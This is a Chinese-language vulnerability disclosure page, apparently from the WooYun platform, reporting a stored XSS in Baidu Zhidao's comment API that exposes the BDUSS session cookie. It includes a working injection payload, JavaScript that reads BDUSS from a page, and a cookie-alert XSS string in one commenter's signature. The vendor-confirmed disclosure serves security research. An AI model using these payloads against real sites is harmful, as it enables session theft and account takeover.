漏洞概要
关注数(24)
关注此漏洞
漏洞标题:百度某分站XSS可以得到BDUSS
相关厂商:百度
提交时间:2015-03-04 18:21
修复时间:2015-04-18 18:22
公开时间:2015-04-18 18:22
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-03-04: 细节已通知厂商并且等待厂商处理中
2015-03-05: 厂商已经确认,细节仅向厂商公开
2015-03-15: 细节向核心白帽子及相关领域专家公开
2015-03-25: 细节向普通白帽子公开
2015-04-04: 细节向实习白帽子公开
2015-04-18: 细节向公众公开
简要描述:
管理员审核真勤快,刚发就删除,截图都快来不及了.
详细说明:
真相问答机里存在BDUSS
http://zhidao.baidu.com/liuyan/detail?id=5809
现在就缺个百度知道的XSS了,o——o!
看了下评论,JSON载入,前台页面过滤了。
但是JSON请求返回的是text/html,且没过滤<>
http://zhidao.baidu.com/api/comment?app=article&thread_id=10000005809&method=get_reply&encoding=gbk&start=0&limit=10&r=1425448854170
接下来就简单了。
评论提交:
[code]
<img src=x onerror=eval(location.hash.slice(1))>
[/code]
Ajax获取下BDUSS
[code]
var xmlhttp;
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
} else {
xmlhttp = new ActiveXObject('Microsoft.XMLHTTP');
}
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
var res = xmlhttp.responseText;
var a = res.indexOf('BDUSS');
var b = res.indexOf('"});');
alert(res.substring(a, b));
}
}
xmlhttp.open('GET', '/liuyan/detail?id=5809', true);
xmlhttp.send();
[/code]
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-03-05 11:46
厂商回复:
感谢提交,已通知业务部门处理
最新状态:
暂无
漏洞评价:
评论
-
2015-03-04 20:40 |
小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-03-04 20:59 |
泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-03-04 21:26 |
LoveSnow ( 路人 | Rank:9 漏洞数:3 | 以正和,以奇胜!)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-18 22:33 |
Fire ant ( 实习白帽子 | Rank:73 漏洞数:26 | 他们回来了................)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-18 22:37 |
X5st ( 路人 | Rank:27 漏洞数:6 | 合伙搞世界)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-19 09:15 |
七寸往事 ( 实习白帽子 | Rank:60 漏洞数:17 | <script>alert(document.cookie)</script>)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-19 10:03 |
X5st ( 路人 | Rank:27 漏洞数:6 | 合伙搞世界)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-19 10:37 |
屠龙宝刀点击就送 ( 路人 | Rank:4 漏洞数:2 | 简要介绍不能为空)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-19 11:59 |
Toom ( 路人 | Rank:6 漏洞数:3 | 啊)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-19 16:12 |
刺丶魂 ( 路人 | Rank:17 漏洞数:9 )
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-20 04:41 |
小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-20 08:35 |
你大爷在此 百无禁忌 ( 路人 | Rank:10 漏洞数:6 | Hello 各位小伙伴们 大家好 我是王尼玛)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-20 09:28 |
小胖纸 ( 实习白帽子 | Rank:37 漏洞数:12 | 找人拿指定金融期货原油网站,只要客户资料...)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-20 10:10 |
Lar2y ( 路人 | Rank:4 漏洞数:3 | 吃口屎冷静一下)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-20 12:42 |
RPG ( 路人 | Rank:2 漏洞数:1 | 还要简要介绍)
一开始让我评论你的时候,其实我是拒绝的。我跟大家讲,我拒绝,因为我根本不会评论,大家跟我讲:评完加特技,评论duang~duang~duang~ 我的评论,假的假的是假的,是特技的评论,是乱评的成分,是评论的特技,duang~
-
2015-04-26 01:36 |
昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)
